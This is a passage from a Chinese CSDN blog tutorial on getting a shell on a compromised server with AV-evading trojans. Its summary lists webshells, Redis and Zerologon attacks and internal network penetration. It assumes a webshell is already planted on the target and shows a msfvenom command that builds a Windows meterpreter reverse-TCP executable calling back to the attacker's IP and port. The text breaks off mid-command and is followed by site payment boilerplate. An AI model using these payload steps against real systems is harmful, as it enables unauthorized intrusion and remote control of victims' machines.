APT级全面免杀拿Shell

本文详细介绍了如何在Windows和Linux环境中利用msf制作和利用免杀木马反弹shell,包括蚁剑、Redis、zerologon漏洞等手段进行渗透。通过免杀木马、Web后门工具webacoo和weevely,实现在kali系统下的服务器控制和内网渗透。
摘要由CSDN通过智能技术生成

 现在情况是已经上传了一句话木马,可以执行如:ls、pwd、whoami等命令;不管是python、bash 还是 perl 都反弹不了, 偷不了懒了,就上 msf 吧。

一、windows一句话木马反弹shell思路

前提:目标在有webshell权限下,利用kali的msf制作木马反弹shell过程。

启动kali中的msf

┌──(root@SC)-[~]
└─# msfconsole

生成exe类型反弹型木马,LHOST=kali 的 ip。

msf6 > msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.173.4 LPORT=4444 -f exe -o shell.exe
[*] exec: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.173.4 LPORT=4444 -f exe -o sh
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

wespten

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值